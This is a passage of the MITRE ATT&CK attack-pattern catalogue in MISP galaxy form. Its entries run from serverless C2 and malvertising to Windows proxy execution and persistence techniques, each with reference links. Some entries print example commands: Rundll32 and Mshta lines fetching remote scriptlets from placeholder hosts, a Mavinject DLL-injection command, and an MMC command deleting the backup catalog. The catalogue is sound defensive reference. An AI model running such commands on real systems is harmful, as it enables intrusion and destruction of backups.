Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)

The tag is: misp-galaxy:mitre-attack-pattern="Serverless - T1583.007"

Table 6391. Table References

Links

https://attack.mitre.org/techniques/T1583/007

https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/

https://blog.xpnsec.com/aws-lambda-redirector/

https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/

Malvertising - T1583.008

Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.(Citation: spamhaus-malvertising) Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites.

Adversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.(Citation: Masquerads-Guardio)(Citation: FBI-search) Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.(Citation: sentinelone-malvertising)

Malvertising may be used to support [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system’s web browser.(Citation: BBC-malvertising)

Adversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.(Citation: Masquerads-Guardio) Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.(Citation: spamhaus-malvertising)

The tag is: misp-galaxy:mitre-attack-pattern="Malvertising - T1583.008"

Table 6392. Table References

Links

https://attack.mitre.org/techniques/T1583/008

https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e

https://www.bbc.com/news/technology-12891182

https://www.ic3.gov/Media/Y2022/PSA221221

https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijacking-search-results/

https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/

Server - T1584.004

Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.

Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.

The tag is: misp-galaxy:mitre-attack-pattern="Server - T1584.004"

Table 6393. Table References

Links

https://attack.mitre.org/techniques/T1584/004

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://threatconnect.com/blog/infrastructure-research-hunting/

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

Trap - T1546.005

Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.

Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)

The tag is: misp-galaxy:mitre-attack-pattern="Trap - T1546.005"

Table 6394. Table References

Links

https://attack.mitre.org/techniques/T1546/005

https://bash.cyberciti.biz/guide/Trap_statement

https://ss64.com/bash/trap.html

Botnet - T1584.005

Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).

The tag is: misp-galaxy:mitre-attack-pattern="Botnet - T1584.005"

Table 6395. Table References

Links

https://attack.mitre.org/techniques/T1584/005

https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html

https://www.imperva.com/learn/ddos/booters-stressers-ddosers/

https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation

CDNs - T1596.004

Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.

Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).

The tag is: misp-galaxy:mitre-attack-pattern="CDNs - T1596.004"

Table 6396. Table References

Links

https://attack.mitre.org/techniques/T1596/004

https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/

Exploits - T1587.004

Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)

As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).

The tag is: misp-galaxy:mitre-attack-pattern="Exploits - T1587.004"

Table 6397. Table References

Links

https://attack.mitre.org/techniques/T1587/004

https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims

https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html

Serverless - T1584.007

Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.

Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)

The tag is: misp-galaxy:mitre-attack-pattern="Serverless - T1584.007"

Table 6398. Table References

Links

https://attack.mitre.org/techniques/T1584/007

https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/

https://blog.xpnsec.com/aws-lambda-redirector/

https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/

Exploits - T1588.005

Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)

In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)

An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).

The tag is: misp-galaxy:mitre-attack-pattern="Exploits - T1588.005"

Table 6399. Table References

Links

https://attack.mitre.org/techniques/T1588/005

https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

https://www.exploit-db.com/

https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html

https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec

https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage

Vulnerabilities - T1588.006

Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)

An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).

The tag is: misp-galaxy:mitre-attack-pattern="Vulnerabilities - T1588.006"

Table 6400. Table References

Links

https://attack.mitre.org/techniques/T1588/006

https://nvd.nist.gov/

Rundll32 - T1218.011

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).

Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).

Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)

The tag is: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011"

Table 6401. Table References

Links

https://attack.mitre.org/techniques/T1218/011

https://github.com/gtworek/PSBits/tree/master/NoRunDll

https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/

https://www.attackify.com/blog/rundll32_execution_order/

https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf

Verclsid - T1218.012

Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)

Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running <code>verclsid.exe /S /C {CLSID}</code>, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub)

The tag is: misp-galaxy:mitre-attack-pattern="Verclsid - T1218.012"

Table 6402. Table References

Links

https://attack.mitre.org/techniques/T1218/012

https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5

https://lolbas-project.github.io/lolbas/Binaries/Verclsid/

https://redcanary.com/blog/verclsid-exe-threat-detection/

https://www.winosbite.com/verclsid-exe/

Mavinject - T1218.013

Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)

Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. <code>C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL</code>).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.

In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its <code>/HMODULE</code> command-line parameter (ex. <code>mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)

The tag is: misp-galaxy:mitre-attack-pattern="Mavinject - T1218.013"

Table 6403. Table References

Links

https://attack.mitre.org/techniques/T1218/013

https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution

https://lolbas-project.github.io/lolbas/Binaries/Mavinject/

https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e

https://reaqta.com/2017/12/mavinject-microsoft-injector/

MMC - T1218.014

Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)

For example, <code>mmc C:\Users\foo\admintools.msc /a</code> will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is <code>mmc gpedit.msc</code>, which will open the Group Policy Editor application window.

Adversaries may use MMC commands to perform malicious tasks. For example, <code>mmc wbadmin.msc delete catalog -quiet</code> deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: <code>wbadmin.msc</code> may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)

Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: <code>mmc.exe -Embedding C:\path\to\test.msc</code>.(Citation: abusing_com_reg)

The tag is: misp-galaxy:mitre-attack-pattern="MMC - T1218.014"

Table 6404. Table References

Links

https://attack.mitre.org/techniques/T1218/014

https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog

https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm

https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/

https://www.ghacks.net/2017/06/10/windows-msc-files-overview/

https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection

COR_PROFILER - T1574.012

Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)

The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)

Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)

The tag is: misp-galaxy:mitre-attack-pattern="COR_PROFILER - T1574.012"

Table 6405. Table References

Links

https://attack.mitre.org/techniques/T1574/012

https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview

https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)

https://github.com/OmerYa/Invisi-Shell

https://offsec.almond.consulting/UAC-bypass-dotnet.html

https://redcanary.com/blog/blue-mockingbird-cryptominer/

https://redcanary.com/blog/cor_profiler-for-persistence/

https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html

KernelCallbackTable - T1574.013

Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)

An adversary may hijack the execution flow of a process using the <code>KernelCallbackTable</code> by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.

A pointer to the memory address of the <code>KernelCallbackTable</code> can be obtained by locating the PEB (ex: via a call to the <code>NtQueryInformationProcess()</code> [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the <code>KernelCallbackTable</code> can be duplicated, and a function in the table (e.g., <code>fnCOPYDATA</code>) set to the address of a malicious payload (ex: via <code>WriteProcessMemory()</code>). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)

The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the <code>KernelCallbackTable</code> may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the <code>KernelCallbackTable</code> to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="KernelCallbackTable - T1574.013"

Table 6406. Table References

Links

https://attack.mitre.org/techniques/T1574/013

https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/

https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess

https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/

https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/

Emond - T1546.014

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place.

The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)

Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.

The tag is: misp-galaxy:mitre-attack-pattern="Emond - T1546.014"

Table 6407. Table References

Links

http://www.magnusviri.com/Mac/what-is-emond.html

https://attack.mitre.org/techniques/T1546/014

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

https://www.xorrior.com/emond-persistence/

Rc.common - T1163

During the boot process, macOS executes <code>source /etc/rc.common</code>, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.

Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).

The tag is: misp-galaxy:mitre-attack-pattern="Rc.common - T1163"

Table 6408. Table References

Links

https://attack.mitre.org/techniques/T1163

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Regsvcs/Regasm - T1121

Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)

Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)

The tag is: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1121"

Table 6409. Table References

Links

https://attack.mitre.org/techniques/T1121

https://lolbas-project.github.io/lolbas/Binaries/Regasm/

https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/

https://msdn.microsoft.com/en-us/library/04za0hca.aspx

https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx

Proxy - T1090

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.

Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.

The tag is: misp-galaxy:mitre-attack-pattern="Proxy - T1090"

Table 6410. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1090

Rootkit - T1014

Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)

Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)

The tag is: misp-galaxy:mitre-attack-pattern="Rootkit - T1014"

Table 6411. Table References

Links

http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf

https://attack.mitre.org/techniques/T1014

https://en.wikipedia.org/wiki/Rootkit

https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/

https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf

Mshta - T1170

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension <code>.hta</code>. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

The tag is: misp-galaxy:mitre-attack-pattern="Mshta - T1170"

Table 6412. Table References

Links

https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/

https://attack.mitre.org/techniques/T1170

https://en.wikipedia.org/wiki/HTML_Application

https://lolbas-project.github.io/lolbas/Binaries/Mshta/

